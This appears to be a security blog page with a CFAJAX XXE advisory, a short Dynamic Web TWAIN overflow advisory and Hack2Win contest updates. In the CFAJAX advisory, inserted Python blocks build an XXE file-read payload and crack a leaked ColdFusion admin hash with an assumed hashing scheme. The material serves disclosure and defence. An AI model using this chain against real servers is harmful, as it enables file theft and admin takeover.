SSD Advisory – Dynamic Web TWAIN SDK Vulnerabilities

Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.

Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TWAIN:

  • DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
  • WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability


SSD Advisory – Yahoo RSS Reader XXE Vulnerability (CFAJAX)

Vulnerability Description
A vulnerability in the way CFAJAX handles incoming requests allows attackers to read arbitrary files from the server through XML External Entity (XXE) injection; in the example below this leads to a takeover of the ColdFusion administrator console. The vulnerability is present in several of the packages CFAJAX provides. Below is an example of its exploitation in Yahoo RSS Reader, but it is not limited to that software: any software that uses CFAJAX is affected.

Unfortunately CFAJAX is no longer maintained (the last version came out on Nov 21st 2005) and emails sent to the author go unanswered, but it is still deployed on several web sites we found on the Internet.

Technical Details
The vulnerability is exploited by supplying a crafted XML document to the CFAJAX-based application, whose XML handling is vulnerable to XXE. The XXE allows us to read locally stored files, in our example neo-security.xml and password.properties; the password hash and salt extracted from them can then be cracked (by brute force) to gain access to the ColdFusion administrator console.
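To make the mechanism behind the attack concrete, here is an added example that is not part of the advisory and not CFAJAX or ColdFusion code. It parses an untrusted request with Python's standard-library xml.sax twice, once with external entity resolution switched on (the vulnerable configuration) and once with it switched off, and shows the local file's contents appearing in the parsed text only in the first case. It uses a plain general entity with a SYSTEM identifier rather than the parameter-entity and CDATA-wrapping trick that cdata-xxe.dtd relies on; the element names, the temporary file and its contents are all constructed for the demonstration.

```python
"""Minimal XXE demonstration with the Python standard library (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects character data the way a naive request handler would."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_request(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse an untrusted XML request body and return its text content.

    resolve_external_entities=True reproduces the vulnerable configuration:
    SYSTEM entities are fetched from the local filesystem (or the network)
    and spliced into the document. False is the hardened configuration.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_payload(target_path: str) -> bytes:
    """Build the attacker's request: a general entity pointing at a local file.

    Element names are assumed; a real target dictates its own schema.
    """
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE request [ <!ENTITY xxe SYSTEM "{target_path}"> ]>\n'
        "<request><feed>&xxe;</feed></request>\n"
    ).encode()


def demo() -> tuple:
    """Write a constructed stand-in for password.properties, then attack
    both parser configurations and return (leaked_text, safe_text)."""
    with tempfile.NamedTemporaryFile("w", suffix=".properties",
                                     delete=False) as f:
        f.write("password=0123456789ABCDEF")  # constructed sample, not real
        path = f.name
    try:
        leaked = parse_request(xxe_payload(path), resolve_external_entities=True)
        safe = parse_request(xxe_payload(path), resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

The only difference between the two runs is a single parser feature: any XML parser that resolves SYSTEM identifiers on behalf of the client can be turned into a file reader, regardless of language. The fix on the application side is the same everywhere: keep external general and parameter entities (and DTD loading, where the library allows it) disabled for untrusted input.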

Exploit
1. Send a single HTTP POST request to a vulnerable server. The exploit data is not logged (by default POST request bodies are not logged); only the requested URL is.

2. Content of cf-92655311.xml listed below:

3. Content of cdata-xxe.dtd listed below:

4. You should receive a response like this:

5. Extract the salt and password values:

6. Now that you have the salt and the password hash, you can crack the password by following these instructions:
Hash is the password variable from ./lib/password.properties.
Salt is the admin.userid.root.salt variable from ./lib/neo-security.xml

Configuration file for John the Ripper:

7. Recover the password and log in to the administrator console (the /CFIDE URL).
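The extraction and cracking steps above, as an added example that is not part of the advisory and does not reproduce its John the Ripper configuration. The hash construction is an assumption: it implements the ColdFusion 10+ scheme as hashcat mode 12600 describes it, sha256 over the uppercase hex SHA-1 of the password concatenated with the salt, output as uppercase hex. If the target stores its administrator hash differently, replace `cf_admin_hash`. The two file fragments, the salt, the password and the wordlist are constructed samples, and the file layouts they follow (a WDDX-style `<var name='admin.userid.root.salt'>` element and a `password=` property line) are assumed.

```python
"""Offline wordlist attack on a leaked ColdFusion admin hash (added example)."""
import hashlib
import re
from typing import Iterable, Optional


def cf_admin_hash(password: str, salt: str) -> str:
    """ASSUMED scheme (ColdFusion 10+ as in hashcat mode 12600):
    sha256(uppercase_hex(sha1(password)) + salt), returned as uppercase hex."""
    inner = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return hashlib.sha256((inner + salt).encode("utf-8")).hexdigest().upper()


def extract_salt(neo_security_xml: str) -> Optional[str]:
    """Pull admin.userid.root.salt out of a neo-security.xml fragment.
    Layout assumed: <var name='admin.userid.root.salt'><string>..</string></var>"""
    m = re.search(
        r"<var\s+name=['\"]admin\.userid\.root\.salt['\"]>\s*<string>([^<]+)</string>",
        neo_security_xml,
    )
    return m.group(1).strip() if m else None


def extract_hash(password_properties: str) -> Optional[str]:
    """Pull the 'password' property out of a password.properties fragment."""
    m = re.search(r"^\s*password\s*=\s*([0-9A-Fa-f]+)\s*$",
                  password_properties, re.MULTILINE)
    return m.group(1).upper() if m else None


def crack(stored_hash: str, salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose hash matches stored_hash, else None."""
    target = stored_hash.strip().upper()
    for word in candidates:
        word = word.rstrip("\r\n")
        if cf_admin_hash(word, salt) == target:
            return word
    return None


# Constructed stand-ins for the two files read through the XXE.
SAMPLE_SALT = "1478012345678"            # constructed, not from a real install
SAMPLE_PASSWORD = "Summer2016!"          # the "unknown" admin password
SAMPLE_NEO_SECURITY = (
    "<wddxPacket version='1.0'><data><struct type='coldfusion.server.ConfigMap'>"
    f"<var name='admin.userid.root.salt'><string>{SAMPLE_SALT}</string></var>"
    "</struct></data></wddxPacket>"
)
SAMPLE_PASSWORD_PROPERTIES = (
    "#Tue Nov 01 12:00:00 IST 2016\n"
    f"password={cf_admin_hash(SAMPLE_PASSWORD, SAMPLE_SALT)}\n"
    "encrypted=true\n"
)
SAMPLE_WORDLIST = ["password", "admin", "coldfusion", "Summer2016!", "Winter2016!"]


def demo() -> Optional[str]:
    """Run the whole chain: extract salt and hash, then crack against the list."""
    salt = extract_salt(SAMPLE_NEO_SECURITY)
    stored = extract_hash(SAMPLE_PASSWORD_PROPERTIES)
    if salt is None or stored is None:
        return None
    return crack(stored, salt, SAMPLE_WORDLIST)


if __name__ == "__main__":
    print("recovered password:", repr(demo()))
```

For a real run, swap `SAMPLE_WORDLIST` for a file iterator over a large list; the per-candidate cost is one SHA-1 and one SHA-256, which is why an unsalted-by-design administrator hash recovered through a file-read bug is worth protecting with a long, random password and by keeping the /CFIDE path off the public Internet.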

Hack2Win – 2nd Day and Summary

At the end of day 2 we had a total of 11 people taking part in the hacking contest, with about 30 people watching them hack live. Thank you all!

I’d like to especially mention the skilled security researchers from Korea, who were the ultimate winners of this contest by finding the most impressive vulnerability as selected by the judges.

As a group they were awarded 1st place and won the cash prize.

We are already thinking about next year's event. It might be fun to change from IP cameras to other consumer electronics. The IP cameras were not much of a challenge this year, with 2 out of the 3 getting hacked and the 3rd getting totally 'bricked', not even working after a factory reset.

We will keep you posted on the vendors' reaction to these vulnerabilities, with updates on the fixes they release and, of course, additional information on the researchers' findings.

Until next year!

Hack2Win – 1st Day Update

Hi,

Thank you to everyone who participated; we had quite a few participants trying their skills at hacking various networking and IoT devices. Out of the 9 available devices, 2 were removed after they were completely owned, and another one was removed because testing caused it to perform a factory reset and become unreachable (no IP address). The two owned devices were the ZyXEL Media Server and the D-Link DCS-5222L; the device that became unreachable was the Tenvis IPROBOT 3 (TZ100).

The ZyXEL Media Server, running firmware V4.70(AFK.1), is currently listed as having no known pre-authentication vulnerabilities, yet in Hack2Win it was compromised to the extent that root access to the box was achieved.

Likewise the D-Link DCS-5222L, running firmware 2.03.01, is currently listed as having no known pre-authentication vulnerabilities. The camera feed was obtained without any user credentials, and the participant was able to move the camera physically and cause it to emit annoying sounds.

Once the vulnerabilities are fixed by the vendors, we will publish full technical details for all of them.

The Tenvis IPROBOT 3 (TZ100) vulnerability that allows a factory reset to be triggered is in the web interface. It can be triggered remotely and requires no authentication. Unfortunately for the contest participant, the device was no longer accessible, so the vulnerability could not be reproduced, nor could it be considered more than a denial of service, which is not eligible in our contest.

The participant mentioned that the vulnerability is an exploitable buffer overflow in the device (Tenvis IPROBOT 3) and that it can be used to gain access to the device. I am sure that tomorrow, after I have had a chance to reconfigure the device, they will be able to repeat the process and get it qualified for a prize, assuming it is more than a denial of service.